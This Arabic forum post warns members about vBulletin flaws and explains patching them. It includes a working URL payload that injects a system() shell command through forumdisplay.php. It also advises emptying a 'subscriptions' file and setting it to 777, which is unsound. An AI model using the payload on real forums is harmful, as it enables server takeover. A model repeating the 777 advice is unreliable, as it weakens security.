أخواني اعضاء منتدى سوالف سوفت ظهرت بالاونة الاخيرة مجموعة كبيرة من الثغرات في الفبولتن
من الاصدار 3.03 وطالع وبكل يوم يتم تسكير الثغرات وانزل نسخة جديدة
اليوم سوف نتحدث عن ثغرة وهي ثغرة
لو أنك نسخت هذا الكود والصقتة بعد عنوان المنتدى سوف تشاهد اسم الادمن وتصاريح المنتدىكود:forumdisplay.php?f=1&GLOBALS[]=1&comma={${system($cmd)}}{${exit()}}&cmd=ls%20-l
والملفات يقال ان الهكرز قد يستغلون هذه الثغرة ؟
الحل ياااخواني انك تقوم بانزال النسخة 3.0.7 وبعد ماتنزلها على جهازك تاخذ الملف فقد
forumdisplay.php
وتحطة بدال اللي عندك وبعد ذلك تنتهي هذه الثغرة العينة
كما أن هنــــاك ملف عنوانة subscriptions
ادخل على هذا الملف واخذف كل مابه وبعد ذلك اعطة تصريح 777
وبعد كذا نكون قضينا على بعض الثغرات هناك ثغرات كثغرت الرسائل الخاصة والمواضيع العشرة
واعتقد ان الاخوان بسوالف ماقصروا
تحياتي أمل من الجميع أن يبلغونا عن الثغرات الجديدة وطريقة حلها
تحياتي لكم